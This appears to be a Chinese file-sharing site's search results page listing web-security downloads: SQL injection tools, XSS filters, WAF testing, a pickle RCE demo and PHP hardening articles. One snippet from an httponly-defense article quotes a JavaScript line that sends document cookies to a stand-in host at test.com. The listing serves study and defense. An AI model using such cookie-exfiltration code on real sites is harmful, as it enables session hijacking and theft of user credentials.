您好,欢迎光临本网站![请登录][注册会员]  

搜索资源列表

  1. Web检测SQL注入攻击小工具

  2. Web检测SQL注入攻击小工具. 只需输入检测网站的URL入口地址,程序就会浏览扫描该站的所有连接路口,将有问题的URL地址或危险地址罗列出来,给用户选择
  3. 所属分类:其它

    • 发布日期:2009-07-09
    • 文件大小:3145728
    • 提供者:net112233
  1. SQL注入攻击与防御

  2. SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL注入隐蔽性极强的特点,本书重点讲解了SQL注入的排查方法和可以借助的工具,总结了常见的利用SQL漏洞的方法。另外,本书还专门从代码层和系统层的角度介绍了避免SQL注入的各种策略和需要
  3. 所属分类:网络攻防

    • 发布日期:2013-10-04
    • 文件大小:38797312
    • 提供者:dal2020
  1. Encoder编码解码攻击

  2. 支持BASE64 md5 url sha等编码和解码
  3. 所属分类:网络安全

    • 发布日期:2016-02-01
    • 文件大小:284672
    • 提供者:pat008
  1. Android安全之Intent Scheme Url攻击分析

  2. Intent scheme url是一种用于在web页面中启动终端app activity的特殊URL,在针对intent scheme URL攻击大爆发之前,很多android的浏览器都支持intent scheme url。 Intent scheme url的引入虽然带来了一定的便捷性,但从另外一方面看,给恶意攻击页面通过intent-based攻击终端上已安装应用提供了便利,尽管浏览器app已经采取了一定的安全策略来减少这一类风险,但显然是不够的。 2014年3月,一篇关于intent
  3. 所属分类:网络攻防

    • 发布日期:2016-12-08
    • 文件大小:320512
    • 提供者:yaqsecurity
  1. 预防XSS攻击和SQL注入XssFilter

  2. 一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而Javascr ipt是新型的“ShellCode”。 二、XS
  3. 所属分类:Java

    • 发布日期:2018-07-23
    • 文件大小:3072
    • 提供者:w609882792
  1. host头攻击.pdf

  2. URL存在http host头攻击漏洞-修复方案
  3. 所属分类:网络安全

    • 发布日期:2020-05-07
    • 文件大小:451584
    • 提供者:qq_34758216
  1. 常用shell 脚本,dos攻击防范,

  2. 常用shell脚本, Dos攻击防范(自动屏蔽攻击IP).sh 一键部署等等 Linux系统发送告警脚本.sh MySQL数据库备份单循环.sh MySQL数据库备份多循环.sh nginx 访问访问日志按天切割.sh nginx.conf nginx访问日志分析脚本.sh shell.txt
  3. 所属分类:Linux

    • 发布日期:2020-05-26
    • 文件大小:13312
    • 提供者:meng0819
  1. PHP中通过语义URL防止网站被攻击的方法分享

  2. 好奇心是很多攻击者的主要动机,语义URL 攻击就是一个很好的例子。此类攻击主要包括对URL 进行编辑以期发现一些有趣的事情。
  3. 所属分类:其它

    • 发布日期:2020-10-28
    • 文件大小:68608
    • 提供者:weixin_38655309
  1. PHP fopen 读取带中文URL地址的一点见解

  2. 之前喜欢用fopen()函数跨域读取图片或其它文件,一直都没发现什么问题。我所用的PHP版本都是5的了,应该不会有CRLF Injection攻击危险吧
  3. 所属分类:其它

    • 发布日期:2020-10-27
    • 文件大小:52224
    • 提供者:weixin_38536397
  1. php通过session防url攻击方法

  2. 主要介绍了php通过session防url攻击方法,可通过session获取用户名再传入URL来防止URL攻击,是非常实用的技巧,需要的朋友可以参考下
  3. 所属分类:其它

    • 发布日期:2020-10-25
    • 文件大小:34816
    • 提供者:weixin_38576392
  1. 处理XSS攻击的调研和落地方案

  2. 1.处理springboot项目的xss攻击的技术调研文档 2.处理富文本的存储类型的XSS攻击 3.处理URL参数层面的反射类型的XSS攻击
  3. 所属分类:网络安全

    • 发布日期:2020-11-17
    • 文件大小:1048576
    • 提供者:mediocre117
  1. ThinkPHP2.x防范XSS跨站攻击的方法

  2. 本文实例讲述了ThinkPHP2.x防范XSS跨站攻击的方法。分享给大家供大家参考。具体如下: 一直使用ThinkPHP2.x,通过乌云有向提交了ThinkPHP XSS攻击的bug,抽时间看了一下。 原理是通过URL传入scr ipt标签,ThinkPHP异常错误页面直接输出了scr ipt。 原理: http://ask.lenovo.com.cn/index.php?s=1 其中m的值是一个不存在的module,同时是一个完全的scr ipt,在异常错误页面中被执行实现XSS跨站攻击。 防
  3. 所属分类:其它

    • 发布日期:2020-12-19
    • 文件大小:45056
    • 提供者:weixin_38649356
  1. xss防御之php利用httponly防xss攻击

  2. xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。 如下js获取cookie信息: 复制代码 代码如下:url=document.top.location.href;cookie=[removed];c=new Image();c.src=’http://www.test.com/c.php?c=’+cook
  3. 所属分类:其它

    • 发布日期:2020-12-19
    • 文件大小:46080
    • 提供者:weixin_38645208
  1. 漏洞复现篇——XSS三种攻击方式复现

  2. XSS又叫CSS (Cross Site scr ipt) ,跨站脚本攻击。它指的是攻击者往Web页面或者URL里插入恶意Javascr ipt脚本代码,如果Web应用程序对于用户输入的内容没有过滤,那么当正常用户浏览该网页的时候,嵌入在Web页面里的恶意Javascr ipt脚本代码会被执行,从而达到恶意攻击正常用户的目的。 XSS漏洞出现的两个条件 可以控制的输入点 输入能返回到前端页面上被浏览器当成脚本语言解释执行 XSS危害 Cookie窃取 会话劫持 键盘记录 客户端信息探查 网页挂马
  3. 所属分类:其它

    • 发布日期:2021-01-08
    • 文件大小:291840
    • 提供者:weixin_38745434
  1. gotestwaf:Go Test WAF是一种工具,可针对各种类型的攻击和绕过技术来测试您的WAF检测功能-源码

  2. 去测试WAF 一个开源Go项目,用于测试不同的Web应用程序防火墙(WAF)的检测逻辑和旁路。 怎么运行的 这是一个三步的请求生成过程,该过程将有效载荷的数量乘以编码器和占位符。假设您定义了2个有效负载,3个编码器(Base64,JSON和URLencode)和1个占位符(HTTP GET变量)。在这种情况下,该工具将在一个测试用例中发送2x3x1 = 6个请求。 有效载荷 您想要发送的有效负载字符串。类似于[removed]alert(111)[removed]或更复杂的东西。到目前为止,还没
  3. 所属分类:其它

    • 发布日期:2021-03-21
    • 文件大小:2097152
    • 提供者:weixin_42133680
  1. Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC-源码

  2. Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或环境中通过加载该字节流来重建它(包括对象的内部结构)(有关更多信息,请参见: -设置易受攻击的Flask应用(app.py)- $ virtualenv venv --python = /您的/路径/到/ python $ source
  3. 所属分类:其它

    • 发布日期:2021-03-17
    • 文件大小:8192
    • 提供者:weixin_42099116
  1. UrlSolver:小型服务,可发现缩短的URL背后的内容-源码

  2. 网址解析器 不要再受到Rickroll的攻击了。 UrlSolver是一个微型Web服务,它输入用户提供的链接并检索最终的目标URL和页面标题。 用法 用户界面 访问以使用简单的JS界面。 手动的 将GET请求发送到以下网址: https://url-solver.herokuapp.com/api?url=https://tiny.pl/h2xvk 您应该得到以下响应: { "url": "https://www.youtube.com/watch?v=dQw4w9WgXcQ",
  3. 所属分类:其它

    • 发布日期:2021-03-16
    • 文件大小:19456
    • 提供者:weixin_42165018
  1. obscurer:一个紧凑的库,用于为HTTP API提供URL遮盖功能-源码

  2. 遮蔽者 一个紧凑的库,用于为HTTP API提供URL遮盖功能。 它是什么? obscurer使您的HTTP API能够使用晦涩的URL,这提供了额外的抽象,在实现3级RESTful API时非常有用。 什么是晦涩的网址? 通常,当使用HTTP创建RESTful API时,API会定义提供可预测结构的URL。 例如,具有product资源的API可能具有/api/products/1/ URL路径,其中1是与之交互的产品的ID。 创建超媒体API时,API负责通过链接定义和管理应用程序的状
  3. 所属分类:其它

    • 发布日期:2021-03-13
    • 文件大小:21504
    • 提供者:weixin_42136837
  1. PHP中通过语义URL防止网站被攻击的方法分享

  2. 什么是语义URL 攻击? 好奇心是很多攻击者的主要动机,语义URL 攻击就是一个很好的例子。此类攻击主要包括对URL 进行编辑以期发现一些有趣的事情。 例如,如果用户chris 点击了你的软件中的一个链接并到达了页面http://example.org/private.php?user=chris, 很自然地他可能会试图改变user的值,看看会发生什么。例如,他可能访问http://example.org/private.php?user=rasmus 来看一下他是否能看到其他人的信息。虽然对G
  3. 所属分类:其它

    • 发布日期:2021-01-20
    • 文件大小:74752
    • 提供者:weixin_38661466
  1. php通过session防url攻击方法

  2. 本文实例讲述了php通过session防url攻击方法。分享给大家供大家参考。具体实现方法如下: 通过session跟踪,可以很方便地避免url攻击的发生,php采用session防url攻击方法代码如下: 复制代码 代码如下:<?php session_start();  $clean = array();  $email_pattern = ‘/^[^s]+([-a-z0-9]+.)+[a-z]{2,}$/i’;  if (preg_match($email_pattern,
  3. 所属分类:其它

    • 发布日期:2021-01-20
    • 文件大小:36864
    • 提供者:weixin_38691641
« 12 3 4 5 6 7 8 9 10 ... 18 »